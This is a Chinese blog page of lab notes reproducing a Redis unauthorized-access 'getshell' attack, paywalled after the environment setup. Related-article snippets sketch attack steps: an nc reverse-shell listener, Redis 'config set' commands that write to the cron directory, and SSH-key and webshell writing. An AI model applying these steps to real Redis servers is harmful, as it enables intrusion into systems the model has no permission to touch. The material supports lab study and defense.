《Redis未授权访问getshell》复现笔记（一）

最新推荐文章于 2025-09-21 22:26:40 发布

原创

最新推荐文章于 2025-09-21 22:26:40 发布 · 851 阅读

1 ·

CC 4.0 BY-SA版权

本文详细记录了复现Redis未授权访问getshell的过程，包括环境介绍、环境搭建（Web服务和Redis服务）以及漏洞利用。通过在攻击机上安装Redis客户端，成功连接并写入phpinfo、shell和木马文件到靶机Web目录。

《Redis未授权访问getshell》复现笔记（一）

利用周末复现了一下Redis未授权访问getshell，期间遇到了一些坑，虽然结果没什么悬念，却花费了不少时间，故将过程详细记录，留给有需要的人。此贴仅供新手参考，大佬勿喷。

一、环境介绍

靶机：CentOS 6.5 （点击下载） IP：192.168.17.140

攻击机：Win10（本机） IP：192.168.8.195

二、环境搭建

1、搭建web服务

这里我用的是phpStudy for Linux (lnmp+lamp一键安装包)
安装：

wget -c http://lamp.phpstudy.net/phpstudy.bin #获取文件
chmod +x phpstudy.bin    #权限设置
./phpstudy.bin 　　　　#运行安装

等待大约十几分钟安装完成。
在这里插入图片描述
我们访问http://192.168.17.140/看一下，如图所示，说明成功开启Web服务。

PS：
phpStudy for Linux使用说明：
默认网站根目录：

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

limb0

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

二十八种未授权访问漏洞合集（暂时最全）

墨痕诉清风的博客

01-04

5720

目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 0x06 Dubbo 未授权访问 0x07 Druid 未授权访问 0x08 Elasticsearch 未授权访问 0x09 FTP 未授权访问 0x10 HadoopYARN 未授权访问 0x11 JBoss 未授权访问 0x12 Jenkins 未授权访问 0x13 Jupyt

第55天：服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE

weixin_52529261的博客

01-27

998

服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE

参与评论您还未登录，请先登录后发表或查看评论

redis未授权getshell四种方式

没有

04-24

6987

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上，然后在从机上加载so文件，我们就可以执行拓展的新命令了。

redis未授权getshell整合利用

qq_40898302的博客

06-13

1895

redis未授权getshell四种方式

Redis未授权访问以及getshell的几种方式

最新发布

you_possible的博客

09-21

1864

Redis数据库未授权访问以及getshell的几种方式。

《Redis未授权访问getshell》复现笔记（二）

limb0的博客

09-16

598

《Redis未授权访问getshell》复现笔记（二）复现完了写马getshell，我们再来复现一下利用crontab反弹shell：使用nc.exe在攻击机上监听9999端口： nc –lvvp 9999 还是使用Redis Clinet写入如下命令 config set dir /var/spool/cron config set dbfilename root set xxx "\n...

Redis未授权访问导致getshell

isxiaole的博客

11-09

3504

redis未授权访问导致getshell redis未授权访问漏洞利用

redis 未授权访问及getshell

Guoke324的博客

04-06

903

目录 redis未授权访问 redis getshell方法写 webshell 文件利用写SSH key进行 getshell 通过写corntab的方式进行getshell redis未授权访问 Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。利用python去检测，或者...

未授权访问漏洞上（漏洞复现合集）

2301_76631050的博客

08-04

1916

Redis 默认情况下，会绑定在0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证(一般为空)的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务，通过脚本执行界面从而获取服务器权限。

Redis 未授权访问漏洞与getshell（附getshell检测工具）

告白的博客

02-24

4492

Redis 简介. Redis 是完全开源免费的，遵守 BSD 协议，是一个灵活的高性能 key-value 数据结构存储，常见用来作为数据库，其在安全配置问题上存在一些问题，如常见的未授权范围与Pickle反序列化

Redis未授权访问漏洞导致getshell

2401_82451607的博客

02-14

482

Redis未授权访问漏洞导致getshell

Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell

05-05

Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab

Linux下Redis未授权访问getshell三种方法（1、秘钥登录）

daxi0ng的博客

11-26

2529

介绍： REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。它通常被称为数据结构服务器，因为值（value）可以是字符串(String), 哈希(H...

redis未授权访问getshell的方式

居上

06-28

2166

redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库端口：6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis未授权访问 Redis默认情况下，会绑定在0.0.0.0:6379，如果没有采用相关的策略，如配置防火墙规则避免其他非信任来源的IP访问，就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red

redis未授权漏洞三大getshell姿势

weixin_67289581的博客

10-17

1904

Redis未授权漏洞是指在默认配置下，Redis服务器会绑定在0.0.0.0:6379端口，如果没有设置密码认证（通常为空），并且没有采取相关的安全策略，如添加防火墙规则来限制访问，那么Redis服务可能会暴露在公网上，导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

尝试从redis未授权访问到getshell的四种姿势(失败)

风沙吹奏的博客

09-14

1008

尝试从redis未授权访问到getshell的四种姿势(失败) 使用Goby扫描某SRC的C段，发现一个Redis未授权，经验证漏洞存在，故尝试Getshell提高危害(拿更多赏金) 虽然Getshell是失败了，但留个坑在这，以后看看失败的原因。目录 crontab-计划任务利用主从复制RCE 通过Web服务写入webshell 写ssh-keygen公钥然后使用私钥登录 1. crontab-计划任务首先现在自己服务器上监听个端口，例如我这里的8998 nc -lvvp 8998 然后re

redis 未授权访问拿shell

blackguest07的博客

03-18

1175

redis未授权访问拿shell

Redis 未授权访问与Get Shell漏洞

K1ose的博客

11-20

1177

Redis 未授权访问与Get Shell漏洞漏洞原理与危害 Redis默认情况下，会绑定在默认端口，如果没有采用相关策略，例如 ①防火墙拦截非信任IP ②端口屏蔽会将Redis服务器暴露在公网上，如果没有设置口令认证，会导致任意用户在访问目标服务器时能够未经授权便访问Redis以及其数据。利用Redis自身提供的config命令进行写文件操作，可以将自己的SSH公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中，进而可以使用对应私钥直接使用ssh服务登陆目标

redis未授权访问getshell

03-16

Redis未授权访问是指Redis服务器的访问控制没有设置好，导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码，从而实现getshell的攻击。为了避免这种情况发生，我们需要对Redis服务器进行安全配置，包括设置密码、限制访问IP等措施。同时，也需要及时更新Redis的版本，以防止已知漏洞被攻击利用。

《Redis未授权访问getshell》复现笔记（一）

《Redis未授权访问getshell》复现笔记（一）

一、 环境介绍

二、 环境搭建

1、 搭建web服务

一、环境介绍

二、环境搭建

1、搭建web服务